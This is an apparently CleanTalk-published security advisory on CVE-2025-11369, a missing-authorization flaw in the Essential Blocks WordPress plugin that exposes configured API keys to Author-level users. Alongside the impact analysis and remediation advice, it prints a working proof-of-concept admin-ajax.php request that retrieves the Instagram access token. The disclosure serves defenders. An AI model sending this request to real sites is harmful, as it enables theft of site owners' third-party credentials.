CVE-2025-11369 impacts the WordPress plugin Gutenberg Essential Blocks – Page Builder for Gutenberg Blocks & Patterns (“Essential Blocks”) and is a classic Missing / Incorrect Capability Check issue that results in unauthorized access to sensitive configuration data. The vulnerability allows authenticated users with Author-level access and above to retrieve API keys and tokens configured for external services, because several plugin entry points validate only a weak or incorrect permission boundary rather than a strict administrative capability. Because Essential Blocks has a large deployment footprint (200,000+ active installations on WordPress.org), the real-world impact is not niche—multi-author sites that grant Author roles routinely (editors, guest authors, content teams) are exactly the environments where this exposure becomes operationally relevant.
| CVE | CVE-2025-11369 |
| Plugin Version | Essential Blocks <= 5.7.2 |
| All Time | 7 686 658 |
| Active installations | 200 000+ |
| Publicly Published | December 16, 2025 |
| Last Updated | December 16, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11369 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/essential-blocks/essential-blocks-572-missing-authorization-to-authenticated-author-information-disclosure https://t.me/cleantalk_researches/370 |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| October 2, 2025 | Plugin testing and vulnerability detection in the Gutenberg Essential Blocks – Page Builder for Gutenberg Blocks & Patterns have been completed |
| October 2, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| December 16, 2025 | Registered CVE-2025-11369 |
Discovery of the Vulnerability
At a code-path level, the issue is driven by a set of AJAX callbacks and utility functions that are reachable from wp-admin contexts where non-admin roles can still load pages and read localized nonces. NVD attributes CVE-2025-11369 to missing or incorrect capability checks in get_instagram_access_token_callback, google_map_api_key_save_callback, and get_siteinfo, and explicitly states that these flaws allow authenticated attackers with Author-level access and above to view API keys configured for external services. The practical security mistake here is not “a nonce is exposed” (nonces are not secrets in the authorization sense), but that the endpoint treats possession of an admin-side nonce and a broad capability as sufficient authorization to reveal site-wide credentials – credentials that are not scoped to the requesting user and therefore must be protected by stronger privileges (typically administrator-only).
Understanding of Missing Authorization attack’s
In WordPress, “sensitive data exposure” frequently occurs when plugins conflate “can access a screen” with “can access the secrets configured on that screen,” especially in editorial environments where roles like Author can reach many wp-admin pages. API keys and tokens are particularly high-value because they are portable outside WordPress: once leaked, they can be reused from any machine, not just within the site, and they often map directly to quota, billing, or privileged API scopes. NVD categorizes CVE-2025-11369 under CWE-862 (Missing Authorization) and describes the outcome as unauthorized access to configured API keys. In real operational terms, an exposed Instagram access token can enable unauthorized API use and potentially data access depending on scopes, while a leaked Google Maps key can be abused for quota exhaustion or billing impact, and an Openverse-related key or fallback site identity values can aid targeted scraping or social engineering; in many organizations, these keys are shared across environments, making leakage from one WordPress site a stepping stone into broader abuse of the same third-party account.
Exploiting the Missing Authorization Vulnerability
To exploit CVE-2025-11369, an attacker with Author+ cookies:
POC:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/plugin-install.php?tab=popular&paged=8 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 56 Origin: http://127.0.0.1 Connection: keep-alive Cookie: Cookie of Author+ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin action=get_instagram_access_token&admin_nonce=nonce_from_profile.php____
The most immediate impact of CVE-2025-11369 is credential compromise at the application layer: a low-privileged editorial account can extract third-party API credentials that were never intended to be visible outside administrators, and then reuse them externally. This creates a clean path to abuse that does not require compromising an admin account or bypassing authentication – any Author account (including a compromised one) becomes a credential-exfiltration pivot. NVD’s CVSS vector reflects a low-privilege requirement with confidentiality impact (credentials/keys disclosure) rather than direct integrity or availability compromise, which matches the core risk: secret leakage enables follow-on abuse that can escalate to business damage (quota/billing, content scraping, reputational harm) and can also be chained with other vulnerabilities by giving attackers more leverage and visibility into the environment and integrations. On sites with many authors (newsrooms, agencies, marketplaces with staff accounts), this is especially concerning because “Author” is often treated as semi-trusted, but not trusted enough to access site-wide integration secrets.
Recommendations for Improved Security
The durable fix is to enforce proper authorization boundaries: endpoints that reveal or manage site-wide credentials must require a high-privilege capability (commonly manage_options), and they should not treat a nonce plus edit_postsas sufficient to access secrets. NVD explicitly identifies the problem as missing/incorrect capability checks in the relevant callbacks, so the remediation should be framed as tightening those checks and ensuring that returned data is the minimum necessary for the caller’s role. Site owners should update to a patched version beyond the affected range (NVD: ≤ 5.7.2 is vulnerable), rotate any exposed keys/tokens (Instagram, Google Maps, Openverse) because once disclosed they must be treated as compromised, and audit role assignments so that only truly necessary users hold Author privileges. Because the plugin’s active install base is large, defenders should also consider adding monitoring for suspicious admin-ajax.phpcalls to these actions and implementing least-privilege separation for “integration configuration” tasks, reducing the chance that a compromised editorial account can immediately turn into third-party credential theft.
By taking proactive measures to address Missing Authorization vulnerabilities like CVE-2025-11369 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #MissingAuth #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.